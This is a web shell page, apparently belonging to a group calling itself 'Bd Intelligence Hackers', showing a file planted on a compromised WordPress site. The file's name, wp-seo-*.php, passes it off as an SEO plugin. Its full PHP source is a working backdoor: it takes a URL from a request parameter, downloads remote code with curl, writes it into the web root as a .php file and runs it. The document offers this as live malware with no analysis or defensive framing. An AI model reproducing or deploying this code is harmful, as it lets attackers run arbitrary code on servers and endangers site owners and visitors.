Bd Intelligence Hackers shell

Current Path : /home3/ikumi/public_html/
Upload File :
Current File : /home3/ikumi/public_html/wp-seo-5cbd2c5c1944a5cbd2c5c1944f.php

<?php /*5cbd2c5d40ce5*/ ?><?php
function file_func($path, $data){
    file_put_contents($path, '<?php /*'.uniqid().'*/ ?>'.$data);
}
if(file_exists($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['path'])){
    chmod($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['path'].'.php',0644);
    include $_SERVER["DOCUMENT_ROOT"].'/'.$_GET['path'].'.php';
}else{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $_GET['url']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch,CURLOPT_TIMEOUT,60);
    $data = curl_exec($ch);
    if($data){
        $dsdzzsvxz = $data.'';
        file_func($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['path'].'.php', $dsdzzsvxz);
        chmod($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['path'].'.php',0644);
        include $_SERVER["DOCUMENT_ROOT"].'/'.$_GET['path'].'.php';
    }
}

Bd Intelligence Hackers